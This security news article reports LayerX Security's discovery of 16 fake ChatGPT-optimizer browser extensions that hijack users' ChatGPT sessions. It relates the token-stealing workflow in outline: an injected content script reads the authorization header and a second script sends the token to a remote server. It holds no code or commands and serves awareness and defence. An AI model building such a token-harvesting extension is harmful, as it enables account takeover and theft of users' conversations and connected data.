More than a dozen malicious Chrome browser extensions made to appear as ChatGPT productivity-enhancing tools are being used by threat actors to steal users’ credentials, continuing a trend of extensions being used to attack AI users.
Researchers with startup LayerX Security found 16 such malicious extensions that were created by the same bad actor, a move designed to reach as many victims as possible.
The extensions use a common mechanism to intercept ChatGPT session authentication tokens, which are then sent to a third-party backend, according to LayerX security researcher Natalie Zargarov, noting that the tokens provide the same account-level access that the users have to such information as conversation histories and metadata.
“As a result, attackers can replicate the users’ access credentials to ChatGPT and impersonate them, allowing them to access all of the user’s ChatGPT conversations, data, or code,” Zargarov wrote in a report this week. “While these extensions do not exploit vulnerabilities in ChatGPT itself, their design enables session hijacking and covert account access, representing a significant security and privacy risk.”
The discovery of the malicious Chrome extensions highlights an ongoing threat to AI users going back several years that has come to the fore over the past several months. Some of the latest examples include OX Security’s detection of two such extensions that had been downloaded more than 900,000 times and were used to steal browsing data and conversations used with AI models from ChatGPT and DeepSeek.
There also is the ongoing GhostPoster campaign that was first reported by Koi Security in December 2025 and involves a malicious Firefox extension. LayerX researchers reported earlier this month that, despite the campaign being exposed, they found 17 more such malicious extensions that collectively were downloaded more than 840,000 times, and that some had been active for more than five years.
The latest Chrome extensions were downloaded about 900 times, which Zargarov admitted is a “drop in the bucket” when compared with GhostPoster and other such campaigns. However, it fits with the growing trend of bad actors using such malicious extensions.
“This campaign coincides with a broader trend: the rapid growth in adoption of AI-powered browser extensions, aimed at helping users with their everyday productivity needs,” she wrote. “Many of these extensions mimic known brands to gain users’ trust, particularly those designed to enhance interaction with large language models. As these extensions increasingly require deep integration with authenticated web applications, they introduce a materially expanded browser attack surface.”
LayerX co-founder and CEO Or Eshed wrote about the threat from malicious browser extensions in November, noting that most enterprise work happens in the browser, so do employee actions, from launching SaaS apps to invoking generative AI tools to pasting in prompts. Still, most traditional security stacks like data loss protection (DLP), endpoint detection and response (EDR), and security service edge (SSE) don’t have visibility into the browser.
“That blind spot is where data leakage, credential theft, and AI-enabled risks now converge and where many of today’s most sophisticated breaches begin,” Eshed wrote.
The number of downloads in the latest campaign may be relatively small, the scope of the attack shows its relevance, though it’s not the only indicator. Such GPT optimizers are popular, and the large number of highly rated legitimate ones in the Chrome Web Store makes it easier for users to miss the warnings signs, Zargarov wrote. One of the extension’s variants has a “featured” status, which gives it more of a veneer of legitimacy.
“It just takes one iteration for a malicious extension to become popular,” she wrote. “We believe that GPT optimizers will soon become as popular as (not more than) VPN extensions, which is why we prioritized the publication of this analysis. Our goal is to shut it down BEFORE it hits critical mass.”
She noted that in all but one of the extension’s iterations, the workflow is the same. A content script is injected into chatgpt.com and observes outbound requests initiated by the ChatGPT web app. The session token is taken from requests containing an authorization header, and a second script receives the message and transmits the token to a remote server.
“This approach allows the extension operator to authenticate to ChatGPT services using the victim’s active session and obtain all users’ history chats and connectors (the users’ Google drive, Slack, Git-hub and other sensitive data sources),” Zargarov wrote.
There are several indications that all the extensions are part of a single and coordinated campaign, such as a shared code base, consistent publisher characteristics, and highly similar icons, branding, and descriptions.
Fifteen of the 16 extensions are distributed through the Chrome Web Store, while one was published through the Microsoft Edge add-ons market.
“This research highlights how browser extensions targeting AI platforms can be leveraged to achieve account-level access through legitimate session mechanisms, without exploiting vulnerabilities or deploying overt malware,” Zargarov wrote. “As AI platforms continue to be integrated into enterprise and personal workflows, browser extensions interacting with authenticated AI services should be treated as high-risk software and subjected to rigorous scrutiny.”
Recent Articles By Author